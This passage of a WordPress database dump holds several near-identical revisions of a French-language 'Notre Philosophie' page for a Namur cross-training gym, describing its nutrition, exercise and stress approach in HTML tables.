(299, 1, '2013-07-04 19:10:38', '2013-07-04 19:10:38', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:10:38', '2013-07-04 19:10:38', '', 5, 'http://www.crosstrainingcenter.be/5-revision-45/', 0, 'revision', '', 0),
(301, 1, '2013-07-04 19:11:52', '2013-07-04 19:11:52', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;<br>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:11:52', '2013-07-04 19:11:52', '', 5, 'http://www.crosstrainingcenter.be/5-revision-47/', 0, 'revision', '', 0),
(300, 1, '2013-07-04 19:11:13', '2013-07-04 19:11:13', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;<br>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:11:13', '2013-07-04 19:11:13', '', 5, 'http://www.crosstrainingcenter.be/5-revision-46/', 0, 'revision', '', 0),
(302, 1, '2013-07-04 19:13:28', '2013-07-04 19:13:28', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:13:28', '2013-07-04 19:13:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-48/', 0, 'revision', '', 0),
(303, 1, '2013-07-04 19:14:58', '2013-07-04 19:14:58', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 100px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:14:58', '2013-07-04 19:14:58', '', 5, 'http://www.crosstrainingcenter.be/5-revision-49/', 0, 'revision', '', 0),
(304, 1, '2013-07-04 19:15:48', '2013-07-04 19:15:48', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 20px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:15:48', '2013-07-04 19:15:48', '', 5, 'http://www.crosstrainingcenter.be/5-revision-50/', 0, 'revision', '', 0),
(305, 1, '2013-07-04 19:16:05', '2013-07-04 19:16:05', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 900px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:05', '2013-07-04 19:16:05', '', 5, 'http://www.crosstrainingcenter.be/5-revision-51/', 0, 'revision', '', 0),
(306, 1, '2013-07-04 19:16:23', '2013-07-04 19:16:23', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:23', '2013-07-04 19:16:23', '', 5, 'http://www.crosstrainingcenter.be/5-revision-52/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(307, 1, '2013-07-04 19:16:45', '2013-07-04 19:16:45', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:16:45', '2013-07-04 19:16:45', '', 5, 'http://www.crosstrainingcenter.be/5-revision-53/', 0, 'revision', '', 0),
(308, 1, '2013-07-04 19:17:07', '2013-07-04 19:17:07', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 350px;\"><a 